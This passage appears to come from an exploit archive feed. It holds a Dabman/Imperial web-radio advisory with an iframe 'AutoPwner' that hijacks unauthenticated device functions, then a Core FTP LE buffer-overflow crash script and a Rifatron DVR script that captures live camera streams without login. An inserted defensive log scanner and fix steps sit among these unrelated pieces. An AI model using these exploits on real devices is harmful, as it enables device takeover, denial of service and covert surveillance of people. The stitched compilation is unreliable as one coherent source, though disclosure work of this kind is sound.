(93.234.141.215) + forwarded remote port (Standard :23).

Get device name from Device
http://93.234.141.215:80/irdevice.xml

Set device name
http://93.234.141.215:80/set_dname?name=PWND

Set boot-logo (HTTP URL, requirement: JPG)
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg

Display or retrieve channel logo
http://93.234.141.215:80:8080/playlogo.jpg

Changing the main menu with the selected language
http://93.234.141.215:80/init?language=us

Play stream
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME

Save audio file as message
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1

Recall channel hotkeys
http://93.234.141.215:80/hotkeylist

Current playback data
http://93.234.141.215:80/playinfo

Set volume from 0-31 & mute function
http://93.234.141.215:80/setvol?vol=10&mute=0

Reset
http://93.234.141.215:80/back

Set stop
http://93.234.141.215:80/stop

Activate all back
http://93.234.141.215:80/exit

Send keystroke combo
http://93.234.141.215:80/Sendkey?key=3


PoC: Exploit
<html>
<head>
<title>Dabman & Imperial - HTML AutoPwner</title>
</head>
<body>
<iframe src="http://93.234.141.215:80/set_dname?name=PWND"></iframe>
<iframe src="http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg"></iframe>
<iframe src="http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME"></iframe>
<iframe src="http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1"></iframe>
</body>
</html>


PoC: Checker for Modifications
#!/usr/bin/perl

use strict;
use warnings;
use LWP::Simple;

my $url1 = 'http://93.234.141.215:80/';
my $source1 = get( $url1 );

my $url2 = 'http://93.234.141.215:80/';
my $source2 = get( $url2 );

print $source1;
print $source2;
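
Seen from the defender's side, the request list in 1.2 doubles as a detection signature. The following added example (not part of the advisory) scans a gateway or proxy HTTP log for AirMusic commands from hosts that are not approved controllers; the log format, network range, controller address and sample lines are constructed assumptions.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Paths from the advisory's "Function(s)" list, grouped by effect on the device.
STATE_CHANGING = {"/set_dname", "/mylogo", "/LocalPlay", "/Sendkey", "/setvol",
                  "/init", "/stop", "/exit", "/back"}
READ_ONLY = {"/irdevice.xml", "/hotkeylist", "/playinfo", "/playlogo.jpg"}
AIRMUSIC_PORTS = {80, 8080}

# Assumptions for this example: the home network and the one permitted controller.
LOCAL_NET = ipaddress.ip_network("192.168.1.0/24")
TRUSTED_CONTROLLERS = {ipaddress.ip_address("192.168.1.20")}

# Constructed sample log, one request per line: <time> <src> <dst:port> <method> <uri>
SAMPLE_LOG = """\
2019-09-10T09:00:01Z 192.168.1.20 192.168.1.50:80 GET /setvol?vol=10&mute=0
2019-09-10T09:00:07Z 192.168.1.77 192.168.1.50:80 GET /playinfo
2019-09-10T09:01:12Z 203.0.113.9 192.168.1.50:80 GET /set_dname?name=TEST
2019-09-10T09:01:13Z 203.0.113.9 192.168.1.50:80 GET /mylogo?url=http://files.example/logo.jpg
2019-09-10T09:01:15Z 203.0.113.9 192.168.1.50:8080 GET /index.html
2019-09-10T09:02:40Z 192.168.1.77 192.168.1.50:80 GET /LocalPlay?url=http://files.example/a.wav&save=1
"""


def inspect_line(line):
    """Return a finding for one log line, or None when nothing is notable."""
    fields = line.split()
    if len(fields) != 5:
        return None
    when, src, dst, _method, uri = fields
    device, _, port = dst.rpartition(":")
    try:
        source = ipaddress.ip_address(src)
    except ValueError:
        return None
    if not port.isdigit() or int(port) not in AIRMUSIC_PORTS:
        return None
    parts = urlsplit(uri)
    if parts.path not in STATE_CHANGING | READ_ONLY:
        return None
    if source in TRUSTED_CONTROLLERS:
        return None

    changing = parts.path in STATE_CHANGING
    reasons = ["state-changing command" if changing else "device query"]
    if source not in LOCAL_NET:
        reasons.append("source outside local network")
    # /mylogo and /LocalPlay make the radio fetch whatever URL it is handed.
    fetched = [u for u in parse_qs(parts.query).get("url", [])
               if u.lower().startswith(("http://", "https://"))]
    if fetched:
        reasons.append("device told to fetch " + fetched[0])
    return {"time": when, "source": src, "device": device, "path": parts.path,
            "severity": "high" if changing else "low", "reasons": reasons}


def scan(log_text):
    """Inspect every line and return the findings in log order."""
    findings = (inspect_line(line) for line in log_text.splitlines())
    return [f for f in findings if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["severity"].upper(), finding["time"], finding["source"],
              "->", finding["device"], finding["path"],
              "; ".join(finding["reasons"]))
```

Because the device performs no authentication of its own, the allowlist has to be enforced and logged at a network control point in front of it.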


Solution - Fix & Patch:
=======================
An updated version is available from the manufacturer Telestar that
resolves the vulnerabilities in all i & d series products.
It is recommended to install the updates as quickly as possible to keep
the devices secure.

1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624


Security Risk:
==============
The security risk of the vulnerabilities in the online web radio with
Wi-Fi and user interface is estimated as critical.
The vulnerability can be exploited by local attackers in a network or by
remote attackers without user interaction or
further privileged user accounts. The potential of the issue being
exploited in thousands of end user devices all over Europe
is estimated as high. The issue could be used by remote attackers for
spreading ransomware / malware, mass defacements, compromises for
further Linux network attacks, or making the devices part of a criminal
IoT botnet.


Credits & Authors:
==================
Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask permission.

Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


Core FTP LE Version 2.2 Build 1935 Buffer Overflow


Core FTP LE version 2.2 build 1935 suffers from a buffer overflow vulnerability.


MD5 | e28b82778e6eea7a6347b8974496ac19

#!/usr/bin/python

# Exploit Title: Core FTP LE Version 2.2, build 1935 - Local Buffer Overflow (SEH Unicode)
# Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a
# buffer overflow vulnerability that may result in a DoS user local folder
# selection pane
# Exploit Type : DOS
# Date: 08-Sep-2019
# Vulnerable Software: Core FTP LE
# Version: Version 2.2, build 1935
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download/coreftplite.exe
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7 Professional SP1(32-bit)
# Exploit Author: Debashis Pal

#Timeline
# Vulnerability Discover Date: 01-Sep-2019
# Vulnerability Report to Vendor: 01-Sep-2019, no response
# Again email to Vendor: 05-Sep-2019, no response
# Public Disclose : 08-Sep-2019

# PoC
# 1. coreftpleversion2-2build1935.txt from POC.py code, open in
#    notepad(coreftpleversion2-2build1935.txt), copy contents
# 2. Open Core FTP LE(Version 2.2, build 1935)
# 3. Select the left interface(CORE FTP LE,local folder selection pane)
# 4. paste contents from notepad
# 5. Application will crash and SEH overwritten with Unicode



crash = "\x43" * 585 #Junk
crash += "\x42" * 2 #nSEH
crash += "\x41" * 2 #SEH
crash += "\x44" * 411 #More Junk


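# Write the pattern to a text file whose contents are pasted into the application.
file = "coreftpleversion2-2build1935.txt"
generate = open(file, "w")
generate.write(crash)
generate.close()  # call close() so the buffer is flushed to disk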

#Attachment: Application will crash and SEH overwritten with Unicode.jpg

Thank you,
Debashis Pal

Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure


The Rifatron Intelligent Digital Security System DVR suffers from an unauthenticated and unauthorized live stream disclosure when the animate.cgi script is called through the Mobile Web Viewer module.


MD5 | 3b87e27dbb257291ff6eeadfd9dc0201

#!/bin/bash
#
#
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
#
#
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
# Product web page: http://www.rifatron.com
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
# Firmware: <=8.0 (000143)
#
#
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
# servicing the security market as a leading CCTV/video surveillance security
# system manufacturer, specializing in stand-alone digital video recorder since
# 1998. We are known for marking the first standalone DVR with audio detection
# and 480 frames per second (fps) and have been focusing on highend products and
# large projects in a variety applications and market. These include government
# and public services, banking and finance, hotels and entertainment, retail
# education, industrial and commercial sectors throughout Europe, Middle East,
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
# Rifatron is trying its utmost for the technology development and customer
# satisfaction to be the best security solution company in the world.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when animate.cgi script is called through Mobile Web Viewer module.
#
# Tested on: Embedded Linux
# Boa/0.94.14rc21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5532
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
#
#
# 03.09.2019
#

#{PoC}
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
echo "Ex.: $0 10.9.8.7:65432 10"
exit
fi
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$STATUS" == "404" ]; then
echo "Target not vulnerable!"
exit
fi
echo "Collecting snapshots..."
for x in {1..10};
do echo -ne $x
curl "$HOST" -o sequence-$x.jpg -#;
sleep 0.6
done
echo -ne "\nDone."
echo -ne "\nRendering video..."
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
cvlc video.mp4 --verbose -1 -f vlc://quit
#
#{/PoC}

